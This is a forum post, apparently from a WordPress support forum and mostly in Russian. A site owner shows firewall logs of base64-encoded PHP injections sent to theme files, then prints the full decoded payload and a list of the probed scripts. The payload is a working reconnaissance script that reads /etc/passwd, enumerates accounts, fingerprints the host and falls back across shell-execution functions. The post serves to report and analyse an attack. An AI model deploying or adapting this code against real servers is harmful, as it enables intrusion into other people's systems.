    27/Aug/15 16:31:13  #8180956  critical     -  37.139.47.83     POST /wp-content/themes/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:14  #8539452  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/category.php - base64-encoded injection - [POST:n538c51 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:16  #7744760  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n828043 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:17  #1960222  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n872b97 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:18  #8097579  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/archive.php - base64-encoded injection - [POST:nff638d = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:19  #1696898  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:21  #3787824  critical     -  37.139.47.83     POST /wp-content/themes/twentytwelve/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:22  #4416995  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n53b3a6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:23  #4313333  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n55d3bf = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:24  #6754886  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:26  #7223893  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/content-image.php - base64-encoded injection - [POST:nbd7fbf = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:27  #4912150  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:nab6e1b = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:28  #2092694  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n53b3a6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:29  #5771130  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n79c1ec = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:31  #4779341  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/search.php - base64-encoded injection - [POST:ne0080b = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:32  #1882497  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/author-bio.php - base64-encoded injection - [POST:nb6b4e6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:33  #4408037  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:nbc8a20 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:34  #8355326  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n635689 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:36  #3419840  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n79c1ec = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:37  #6846525  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/content-status.php - base64-encoded injection - [POST:na3cd7a = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:38  #4943324  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/footer.php - base64-encoded injection - [POST:n44390c = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:39  #2630006  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:na04af1 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:41  #2136151  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n9e5e25 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:42  #6541746  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n95dde0 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:43  #5368632  critical     -  37.139.47.83     POST /wp-content/themes/twentyeleven/sidebar-page.php - base64-encoded injection - [POST:n8e416f = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:44  #8481968  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/inc/customizer.php - base64-encoded injection - [POST:na23eb7 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:46  #5453920  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n33beb2 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 16:31:47  #6897227  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n78cd5a = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
    27/Aug/15 17:05:49  #8816414  medium     531  136.243.5.215    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]

    Вот логи моего перехватчика:

    Пихает циферный параметр «nf8ce7b» с BASE64-строкой, содержащей:

    // Decoded payload: a host-reconnaissance script. Every finding is written
    // to the HTTP response as one line (see trace() below) prefixed with the
    // session ID defined here, so the sender reads the results back from the
    // response body of the POST it made.
    @error_reporting(E_ALL);
    @ini_set("display_startup_errors",1);
    @ini_set("display_errors",1);
    @set_time_limit(0);
    
    // Session/campaign identifier; every output line starts with "ID[1276210]".
    define('SID', '1276210');
    $_ID = 'ID[' . SID . ']';
    $GLOBALS['ID'] = $_ID;
    
    // Fixed marker (sha1 of a constant) followed by basic host facts: platform,
    // PHP version, the disable_functions setting and a host fingerprint.
    trace("MARK: " . sha1('1234567890'));
    trace("OS: " . PHP_OS);
    trace("PHPVER: " . PHP_VERSION);
    trace("DFUN: " . @ini_get('disable_functions'));
    trace("<HWID>" . get_uniq_id() . "</HWID>");
    
    // Directory names treated as a web root, and parent-directory names that
    // are not reported as a home directory.
    $path_ignore = array('home','vhosts');
    $wwwdirs = array("www", "public_html", "html", "httpdocs", "web", "domains", "htdocs", "public");
    $GLOBALS['wwwdirs'] = $wwwdirs;
    
    // Report DOCUMENT_ROOT (trailing slash stripped) and, when its basename is
    // one of $wwwdirs, the directory two levels up as a candidate home directory.
    if (isset($_SERVER['DOCUMENT_ROOT']) && $_SERVER['DOCUMENT_ROOT'] !== '') {
    	$droot = preg_replace("#/$#", "", $_SERVER['DOCUMENT_ROOT']);
    	trace("DROOT: " . $droot);
    
    	// NOTE: count() is applied to the string returned by realpath(), not to an array.
    	if (false !== array_search(@basename($droot), $wwwdirs) &&
    	    false === array_search(@basename(realpath("$droot/../../")), $path_ignore) &&
    		count(@realpath("$droot/../../")) > 1) {
    		trace("HOME: " . @realpath("$droot/../../"));
    	}
    } else {
    	trace("DROOT: <undef>" );
    } 
    
    // Effective user, working directory and the open_basedir restriction
    // (path separators normalised to DIRECTORY_SEPARATOR; empty when unset).
    trace("USER: " . @get_current_user(). " (" . @getmyuid() . ")");
    trace("CWD: " . @getcwd());
    if (strlen(@ini_get( 'open_basedir')) > 0 ) {
    	$GLOBALS['basedir'] = preg_replace('/[\/\\\]+/', DIRECTORY_SEPARATOR, @ini_get('open_basedir'));
    	trace("BASEDIR: " . $GLOBALS['basedir']);
    } else {
    	trace("BASEDIR: /");
    	$GLOBALS['basedir'] = '';
    }
    
    // Windows hosts are only reported and the script stops; the account
    // enumeration below runs on Unix-like hosts only.
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
    	trace("WIN");
    	$GLOBALS['os'] = "win";
    	trace("WIN_ALL");
    	exit;
    } else {
       	trace("NIX");
    	$GLOBALS['os'] = "nix";
    }
    
    // Enumerate local accounts. First attempt: stream `getent passwd` through
    // popen/proc_open (getpasswd_stream() calls parse_user() per line itself).
    // Fallback: getpasswd_exec(), which returns the lines (from getent,
    // /etc/passwd or `cat /etc/passwd`) for the loop below to parse.
    trace("TRY GETENT");
    
    if (getpasswd_stream()) {
    	trace("+GET PASSWD STREAM");
    } else {
    	trace("-GET PASSWD STREAM");
    	trace("GET PASSWD EXEC");
    	$passwd = getpasswd_exec();
    
    	if ($passwd) {
    		foreach ($passwd as $user) {
    			parse_user($user);
    		}
    	} else {
    		trace("NOTHING FOUND");
    	}
    }
    
    // Second pass through the posix extension (uids 0..5000), run regardless
    // of whether the previous step succeeded.
    trace("TRY POSIX");
    if (getpasswd_posix())
    	trace("+GET PASSWD POSIX");
    else
    	trace("-GET PASSWD POSIX");
    
    trace("ALL DONE, EXIT");
    
    exit;
    
    //-------------------
    
    // Returns true for directories that must not be reported as home
    // directories: "/" itself, or any path containing one of the listed
    // substrings (system, spool, mail, log and control-panel locations).
    // strpos() means a match anywhere in the path counts, not only a prefix.
    function skip_dir($dir) {
    	$excludes = array ("/spool", "/nonexist", "/empty", "/var/lib", "/var/cache", "/proc", "/var/run", "/var/mail", "/mysql", "/usr/lib/", "/libexec", "/etc/", "/usr/bin", "/usr/sbin", '/nonexistent', '/dev/', '/var/log/' , '/var/lib/', '/var/cpanel','/tmp', '/clamav', '/cpanel', '/syslog');
    
    	if ($dir === "/")
    		return true;
    
    	foreach ($excludes as $exclude)  {
    		if (false !== strpos($dir, $exclude))
    			return true;
    	}
    
    	return false;
    }
    
    // Returns true when $path is considered allowed under open_basedir: always
    // when the setting cannot be read (ini_get() returns false) or is empty,
    // otherwise only when one of the ':'-separated entries occurs as a
    // substring of $path. Not called from anywhere in the visible listing.
    function check_base($path) {
    	$str = ini_get('open_basedir');
    
    	if (false === $str)
    		return true;
    
    	if (strlen($str)  > 0) {
    		$allowed_dirs = explode(':', $str);
    
    		foreach ($allowed_dirs as $dir) {
    			if (false !== strpos($path, $dir))
    				return true;
    		}
    
    //		trace ("open_basedir: " . $str . " " . $path);
    		return false;
    	}
    
    	return true;
    }
    
    // Output channel for every finding: echoes the global ID prefix, a space,
    // $str with newlines collapsed to spaces, and a trailing newline. Because
    // it uses echo, the results go straight into the HTTP response body of
    // the request that carried the payload.
    function trace($str) {
    	echo $GLOBALS['ID']." ".str_replace("\n", " ", $str)."\n";
    }
    
    // Handles one passwd-format line ("name:pw:uid:gid:gecos:home:shell").
    // Lines with fewer than six ':'-separated fields are reported as
    // "UNKNOWN USER". Accounts with uid >= 80 whose home directory (separators
    // normalised) is not excluded by skip_dir() are reported as "HOME: <dir>";
    // other accounts are silently skipped. $name and $group are read but not
    // used. Always returns true.
    function parse_user($line) {
    	$info = explode(":", $line);
    
    	if (count($info)  >= 6) {
    		$name = $info[0];
    		$uid = $info[2];
    		$group = $info[3];
    		$home = preg_replace('/[\/\\\]+/', DIRECTORY_SEPARATOR, $info[5]);
    
    		if ($uid >= 80 && !skip_dir($home)) {
    			trace("HOME: $home");
    		} else {
    //			trace("SKIP: ". join(':', $info));
    		}
    	} else {
    		trace("UNKNOWN USER: '" . $line . "'");
    	}
    
    	return true;
    }
    
    // Collects the account list as an array of lines, trying in order:
    // `getent passwd` through my_exec() (accepted only if the appended
    // "STATUS=0" marker is present in the output), then reading /etc/passwd
    // with file(), then `cat /etc/passwd` through my_exec(). Each attempt's
    // outcome is reported via trace(). Returns false when all three fail.
    // Note that file() keeps the trailing newline on each line, while the
    // explode()-based paths do not.
    function getpasswd_exec () {
    	$myuid = @getmyuid();
    
    	trace("MYUID: $myuid");
    
    	$cmd = "getent passwd 2>&1 ; echo \"STATUS=\"\$?";
    
    	$out = my_exec($cmd);
    
    	if (false !== $out and (strpos($out, "STATUS=0") !== false)) {
    		trace ("getent STATUS=0");
    
    		$passwd = explode ("\n", $out);
    
    		return $passwd;
    	} else {
    		trace("S_FAIL: $cmd " . str_replace("\n", " ", $out) );
    	}
    
    	$passwd = @file("/etc/passwd");
    
    	if (false !== $passwd) {
    		trace ("S_OK: READ_PASSWD");
    
    		return $passwd;
    	}
    
    	trace("ERROR: CANT_READ_PASSWD");
    
    	$cmd = "cat /etc/passwd 2>&1 ; echo \"STATUS=\"\$?";
    
    	$out = my_exec($cmd);
    
    	if (false !== $out && (strpos($out, "STATUS=0") !== false) ) {
    		trace("S_OK: $cmd");	
    
    		$passwd = explode ("\n", $out);
    
    		return $passwd;
    	} else {
    		trace("S_FAIL: $cmd " . str_replace("\n", " ", $out) );
    	}
    
    	return false;
    }
    
    // Runs `getent passwd` through popen() (preferred) or proc_open() and
    // feeds every output line to parse_user() as it is read. Returns false
    // when neither function exists or the process could not be started.
    // The trailing "STATUS=<n>" line the command appends is also passed to
    // parse_user(), which reports it as "UNKNOWN USER"; when it is the only
    // line read ($count_lines == 1) the result is reported as 'EMPTY' and
    // false is returned so the caller falls back to getpasswd_exec().
    function getpasswd_stream() {
    	$cmd = "getent passwd 2>&1 ; echo \"STATUS=\"\$?";
    
    	if (!function_exists('popen')) {
    		if (!function_exists('proc_open')) {
    			return false;
    		} else {
    			trace("PROC_OPEN");
    			$descriptorspec = array(
    				0 => array("pipe", "r"),
    				1 => array("pipe", "w"),
    				2 => array("pipe", "r")
    			);
    			$f = @proc_open($cmd, $descriptorspec, $pipes, NULL, NULL);
    		}
    	} else {
    		trace("POPEN");
    		$f = @popen($cmd,"r");
    	}
    
    	if (is_resource($f)) {
    		// $pipes is only set on the proc_open() path; its stdout pipe is read there.
    		if (isset($pipes)) {
    			$fd = $pipes[1];
    		} else {
    			$fd = $f;
    		}
    
    		$count_lines = 0;
    
    		while ($line = @fgets($fd)) {
    			$count_lines++;
    			parse_user($line);
    		}
    
    		if (isset($pipes)) {
    			@fclose($fd);
    			@proc_close($f);
    		} else {
    			@pclose($f);
    		}
    
    		if ($count_lines == 1) {
    			trace('EMPTY');
    			return false;
    		}
    
    		return true;
    	} else {
    		return false;
    	}
    }
    
    // Enumerates accounts without a shell or passwd file: looks up every uid
    // from 0 to 5000 inclusive with posix_getpwuid() and hands each hit to
    // parse_user() as a ':'-joined passwd-style line. Returns false only when
    // the posix extension is unavailable, true otherwise (even if nothing was found).
    function getpasswd_posix() {
    	if (!function_exists('posix_getpwuid'))
    		return false;
    
    	for($i = 0; $i <= 5000; $i++) {
    	    $uid = @posix_getpwuid($i);
    	    if ($uid)
    			parse_user(join(':',$uid));
    	}
    
    	return true;
    }
    
    // Runs a shell command through whichever execution primitive is still
    // available, in order: exec(), passthru(), system(), shell_exec(), then
    // popen()/proc_open(). Returns the captured stdout as a string. When none
    // of them exists it reports "EXEC_FUNCTIONS_DISABLED", sets the global
    // 'noexec' flag and returns false; later calls short-circuit on that flag.
    // For the log reader: the set of functions that worked is what the
    // "DFUN" line (disable_functions) reported earlier leaves enabled.
    function my_exec($in) {
    	$out = '';
    
    	if (isset($GLOBALS['noexec'])) {
    		return false;
    	}
    
    	if (function_exists('exec')) {
    	    @exec($in, $out);
    	    $out = @join("\n", $out);
    	} elseif (function_exists('passthru')) {
    		ob_start();
    		@passthru($in);
    		$out = ob_get_clean();
    	} elseif (function_exists('system')) {
    		ob_start();
    		@system($in);
    		$out = ob_get_clean();
    	} elseif (function_exists('shell_exec')) {
    		$out = @shell_exec($in);
    	} elseif (function_exists('popen') || function_exists('proc_open')) {
    		if (!function_exists('popen')) {
    			$descriptorspec = array(
    					0 => array("pipe", "r"),
    					1 => array("pipe", "w"),
    					2 => array("pipe", "r")
    			);
    			$f = @proc_open($in, $descriptorspec, $pipes, NULL, NULL);
    		} else {
    			$f = @popen($in,"r");
    		}
    
    		if (is_resource($f)) {
    			// $pipes is only set on the proc_open() path; stdout is read from it.
    			if (isset($pipes)) {
    				$fd = $pipes[1];
    			} else {
    				$fd = $f;
    			}
    
    			while ($line = @fgets($fd)) {
    				$out .= $line;
    			}
    
    			if (isset($pipes)) {
    				@fclose($fd);
    				@proc_close($f);
    			} else {
    				@pclose($f);
    			}
    		}
    	} else {
    		trace("ERROR: EXEC_FUNCTIONS_DISABLED");
    		$GLOBALS['noexec'] = 1;
    		return false;
    	}
    
    	return $out;
    }
    
    // Builds the host fingerprint reported in the <HWID> line: a sha1 over the
    // platform string, uname, SAPI, PHP and Zend versions, the server
    // software header, SERVER_ADDR with its last octet removed, the loaded
    // extension list and the ifconfig lines matching 'HWaddr|ether|inet'
    // (obtained through my_exec()). The same host therefore yields the same
    // ID across repeated probes, which is how the sender recognises it.
    function get_uniq_id() {
    	$ids = array(
    	    PHP_OS,
    	    @php_uname(),
    	    PHP_SAPI,
    	    PHP_VERSION,
    	    @zend_version(),
    	    @$_SERVER["SERVER_SOFTWARE"],
    	    substr(@$_SERVER["SERVER_ADDR"],0,strrpos(@$_SERVER["SERVER_ADDR"],'.')),
    	    @join("\n", @get_loaded_extensions()),
    	    my_exec("ifconfig | grep -E 'HWaddr|ether|inet'"),
    	);
    
    	return @sha1(@join("\n", $ids));
    }

    Перечень перебираемых скриптов:

    /wp-content/themes/twentythirteen/tag.php
    /wp-content/themes/twentythirteen/functions.php
    /wp-content/themes/twentytwelve/sidebar.php
    /index.php
    /wp-content/themes/twentyfourteen/inc/featured-content.php
    /wp-content/themes/twentythirteen/author.php
    /wp-content/themes/twentyfourteen/content-gallery.php
    /wp-content/themes/twentytwelve/content.php
    /wp-content/themes/twentyfifteen/archive.php
    /wp-content/themes/twentyfifteen/index.php
    /wp-content/themes/twentythirteen/content-image.php
    /wp-content/themes/twentyfifteen/search.php
    /wp-content/themes/twentyfifteen/author-bio.php
    /wp-content/themes/twentythirteen/footer.php
    /wp-content/themes/twentyeleven/sidebar-page.php

    Возможно, в стандартных темах встроено что-то не совсем нужное пользователям…

    Модератор Yui

    (@fierevere)

    永子
